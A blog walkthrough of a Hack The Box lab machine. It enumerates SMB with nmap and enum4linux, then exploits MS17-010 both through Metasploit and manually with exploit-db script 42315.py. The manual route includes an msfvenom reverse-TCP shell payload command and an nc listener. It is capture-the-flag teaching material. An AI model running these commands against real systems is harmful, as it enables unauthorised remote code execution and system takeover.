This is my first walk-through for a very old machine from Hack The Box page. Also this is my first box 🙂 We will see how we can root it both with metasploit and manually.
At the time this blog post was written, Python 2 has reached EOL and is no longer being maintained in the Debian repositories so also no longer supported from Kali Linux. Below we will see a workaround for this in order to use our favorite python2 exploits. So let’s start!
Information Gathering
First we need to scan the box so we fire up nmap
sudo nmap -A -Pn -vv -T4 -p- 10.129.80.232
We see the following results
We see that two ports are open (139,445) which are usually used for the SMB service. Also most likely we have a windows machine. More information is provided from the scripts that were triggered from -A option.
Various info can be retrieved from these scripts but for now we won’t utilize it. Since this is the only service we have available we will enumerate it. First we will use the enum4linux script.
enum4linux -a 10.129.80.232
In case you don’t receive enough information like below you might need to set your smb conf.
So we set our /etc/samba/smb.conf like below
If we try again to enumerate it we will see more info but nothing that might help us significantly. Various access denied messages are popping up.
We continue the enumeration with nmap scripts specifically for smb services
sudo nmap --script smb-vuln* -p 139,445 10.129.80.232
From these scripts we see two possible RCEs. We will take the route of exploring the second option. Note here that we can also root the machine with the MS08-67.
Exploitation Phase
Metasploit
Now we know some possible ways to step a foot on the machine. Let’s see what we can find from metasploit. We search with this
search ms17-010
Some possible exploits come up. Since this is an old machine we need support for 32-bit arch so we select the 4th exploit and we let the default payload which is meterpreter. We set the LHOST(our machine ip) and RHOSTS(target ip) and we run it and we get our SYSTEM privilege shell
Then we can navigate to Administrators Desktop to get the flag
Also the same with the user John.
Manual Exploitation
We search in exploit-db for possible ms17_010 exploits
searchsploit ms17-010
From the results we see that we have some possible exploits. Two are for x86-32bit and randomly we selected the second one. We copy it locally so we can change it
searchsploit -m 42315.py
If we try to execute this with the target ip, we will received various failures about missing dependencies. So in order to install them we also need python2. We follow the directions from here so we can install python2 and pip. We set python2 for use and install the dependencies
pyenv global 2.7.18
#pyenv versions //see availiable versions
#pyenv global system // this will set python3 back
#dependencies
pip2 install impacket
wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py
Before we continue with the modification of the python script we will need to create a reverse tcp shell with msfvenom so we can send it to the target for execution. We do that with this command
msfvenom -p windows/shell_reverse_tcp LHOST=<yourKaliIPhere> LPORT=443 -f exe > myshell.exe
The we do the following changes in our script 42315.py
Now we are ready to run it but since this will open a reverse tcp shell we have to open and wait for this connection on our machine to the port we specified earlier in msfvenom
sudo nc -vnlp 443
and then we run our script and we get a root shell!
python2 42315.py 10.129.80.232
Have Fun!
VostDev 
1 Comment